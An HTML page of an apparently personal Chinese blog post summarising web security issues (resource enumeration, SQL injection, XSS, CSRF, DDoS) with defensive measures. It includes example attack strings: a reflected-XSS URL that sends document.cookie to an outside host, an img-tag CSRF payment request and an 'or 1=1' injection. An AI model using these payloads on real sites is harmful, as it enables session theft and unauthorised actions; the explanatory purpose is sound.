<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="安全," />








  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.1" />






<meta name="description" content="资源枚举遍历站点可访问的文件夹，枚举可能存在的文件名，这样有可能下载到重要文件。措施:不要将重要文件放到公众可访问到的地方 参数操纵SQL注入提交含有SQL操作语句的信息给后端，比如一本书的详情url是这样：1book.com/book?id=100 这意味着这本书在数据库中的id为100，后端可能直接将这个id取出来，使用下面的语句查询：1select * from booktable wher">
<meta name="keywords" content="安全">
<meta property="og:type" content="article">
<meta property="og:title" content="Web安全问题总结">
<meta property="og:url" content="http://iamzay.github.io/2017/09/21/Web安全问题总结/index.html">
<meta property="og:site_name" content="我是郑安源">
<meta property="og:description" content="资源枚举遍历站点可访问的文件夹，枚举可能存在的文件名，这样有可能下载到重要文件。措施:不要将重要文件放到公众可访问到的地方 参数操纵SQL注入提交含有SQL操作语句的信息给后端，比如一本书的详情url是这样：1book.com/book?id=100 这意味着这本书在数据库中的id为100，后端可能直接将这个id取出来，使用下面的语句查询：1select * from booktable wher">
<meta property="og:updated_time" content="2017-09-21T02:45:55.796Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Web安全问题总结">
<meta name="twitter:description" content="资源枚举遍历站点可访问的文件夹，枚举可能存在的文件名，这样有可能下载到重要文件。措施:不要将重要文件放到公众可访问到的地方 参数操纵SQL注入提交含有SQL操作语句的信息给后端，比如一本书的详情url是这样：1book.com/book?id=100 这意味着这本书在数据库中的id为100，后端可能直接将这个id取出来，使用下面的语句查询：1select * from booktable wher">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://iamzay.github.io/2017/09/21/Web安全问题总结/"/>





  <title>Web安全问题总结 | 我是郑安源</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">我是郑安源</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://iamzay.github.io/2017/09/21/Web安全问题总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Zay">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="我是郑安源">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Web安全问题总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-21T01:25:54+08:00">
                2017-09-21
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web/安全/" itemprop="url" rel="index">
                    <span itemprop="name">安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/09/21/Web安全问题总结/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2017/09/21/Web安全问题总结/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="资源枚举"><a href="#资源枚举" class="headerlink" title="资源枚举"></a>资源枚举</h1><p>遍历站点可访问的文件夹，枚举可能存在的文件名，这样有可能下载到重要文件。<br>措施:不要将重要文件放到公众可访问到的地方</p>
<h1 id="参数操纵"><a href="#参数操纵" class="headerlink" title="参数操纵"></a>参数操纵</h1><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><p>提交含有SQL操作语句的信息给后端，比如一本书的详情url是这样：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">book.com/book?id=100</div></pre></td></tr></table></figure></p>
<p>这意味着这本书在数据库中的id为100，后端可能直接将这个id取出来，使用下面的语句查询：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">select * from booktable where id=100</div></pre></td></tr></table></figure></p>
<p>如果把url更改为<code>book.com/book?id=100or1=1</code>，且此时后端没有进行防护，则查询语句会变成：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">select * from booktable where id=100 or 1=1</div></pre></td></tr></table></figure></p>
<p>措施：</p>
<ul>
<li>验证用户的输入</li>
<li>对用户提供的所有输入进行编码</li>
<li>使用语言自带的存储程序，而不是自己操纵数据库</li>
</ul>
<h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><p>XSS的特点是想尽一切办法在目标网站上执行第三方脚本。</p>
<h3 id="基于反射的XSS"><a href="#基于反射的XSS" class="headerlink" title="基于反射的XSS"></a>基于反射的XSS</h3><p>有时用户会在页面上输入一些信息，且JS可能会将输入的信息重新展示一遍，如果不对输入进行过滤，那么当恶意用户输入的内容是一段包含script标签的脚本时，浏览器就会执行这段脚本。比如，通过QQ群等群发下面的链接就能获取用户的cookie:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">book.com/search?name=&lt;script&gt;document.location=&apos;http://vajoy/get?cookie=&apos;+document.cookie&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<p>这是基于反射的XSS，由服务器返回脚本，客户端执行。</p>
<h3 id="基于DOM或本地的XSS"><a href="#基于DOM或本地的XSS" class="headerlink" title="基于DOM或本地的XSS"></a>基于DOM或本地的XSS</h3><p>比如通过为用户提供免费的WiFi，但提供WiFi的网关会往用户访问的任何页面中插入脚本，像这种无需服务器返回脚本直接跨域发送用户信息的行为就是本地XSS攻击。</p>
<h3 id="基于存储的XSS"><a href="#基于存储的XSS" class="headerlink" title="基于存储的XSS"></a>基于存储的XSS</h3><p>网站一般都会将用户发表的内容，如留言、评论等保存在数据库中，这样等用户下次访问网页还能看到。通过XSS攻击将恶意脚本保存到服务器数据库中，这样之后访问这些发表内容的用户都会遭到攻击。</p>
<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><p>跨域请求伪造。假设一个网站只要用户登录后没关闭浏览器，用户在任何情况下都可以免去身份验证而进行所有操作。这样如果此时给用户发送邮件，且其中有一个图片的src是<code>&lt;img src=&#39;http://book.com/pay?bookid=100&#39;/&gt;</code>，那么通过src的请求，用户在不知情的情况下完成了支付的操作。防护CSRF可进行下面这些措施：</p>
<ul>
<li>检查报文头中的Referer参数确保请求发自正确的网站</li>
<li>对于任何重要的请求都重新验证用户的身份</li>
<li>创建一个唯一的token，将其存在服务端的session和客户端的cookie中，对任何请求都检查二者是否一致。</li>
</ul>
<h1 id="DDoS"><a href="#DDoS" class="headerlink" title="DDoS"></a>DDoS</h1><p>通过大量占用服务器带宽和计算资源以达到瘫痪对方网络的目的。</p>
<h1 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h1><ul>
<li>对用户的输入进行编码和过滤</li>
<li>谨慎地返回用户输入的信息</li>
<li>检查、验证请求源，对每一个重要的操作都重新验证</li>
<li>设置http header: “X-XSS-Protection:1”</li>
</ul>
<h1 id="感谢"><a href="#感谢" class="headerlink" title="感谢"></a>感谢</h1><ul>
<li><a href="http://www.cnblogs.com/vajoy/p/4176908.html" target="_blank" rel="external">http://www.cnblogs.com/vajoy/p/4176908.html</a></li>
</ul>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/安全/" rel="tag"># 安全</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/20/前端跨域问题总结/" rel="next" title="前端跨域问题总结">
                <i class="fa fa-chevron-left"></i> 前端跨域问题总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
    <div style="text-align:center;">
        <button class="btn" id="load-disqus" onclick="disqus.load();">加载 Disqus 评论(需翻墙)</button>
    </div>
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/avatar.jpg"
               alt="Zay" />
          <p class="site-author-name" itemprop="name">Zay</p>
           
              <p class="site-description motion-element" itemprop="description">好好生活</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">53</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">23</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">28</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#资源枚举"><span class="nav-number">1.</span> <span class="nav-text">资源枚举</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参数操纵"><span class="nav-number">2.</span> <span class="nav-text">参数操纵</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入"><span class="nav-number">2.1.</span> <span class="nav-text">SQL注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS"><span class="nav-number">2.2.</span> <span class="nav-text">XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#基于反射的XSS"><span class="nav-number">2.2.1.</span> <span class="nav-text">基于反射的XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于DOM或本地的XSS"><span class="nav-number">2.2.2.</span> <span class="nav-text">基于DOM或本地的XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于存储的XSS"><span class="nav-number">2.2.3.</span> <span class="nav-text">基于存储的XSS</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF"><span class="nav-number">2.3.</span> <span class="nav-text">CSRF</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DDoS"><span class="nav-number">3.</span> <span class="nav-text">DDoS</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#解决方案"><span class="nav-number">4.</span> <span class="nav-text">解决方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#感谢"><span class="nav-number">5.</span> <span class="nav-text">感谢</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zay</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://zay-today.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://iamzay.github.io/2017/09/21/Web安全问题总结/';
          this.page.identifier = '2017/09/21/Web安全问题总结/';
          this.page.title = 'Web安全问题总结';
        };
        var disqus = {
         load : function disqus(){
        (function () {
        var s = document.createElement('script'); s.async = true;
        s.type = 'text/javascript';
        s.src = 'https://zay-today.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
         (document.head || document.body).appendChild(s);
         }());
        $('#load-disqus').remove(); ///加载后移除按钮
  }
  };
      </script>
    

  













  





  

  

  

  

  

</body>
</html>
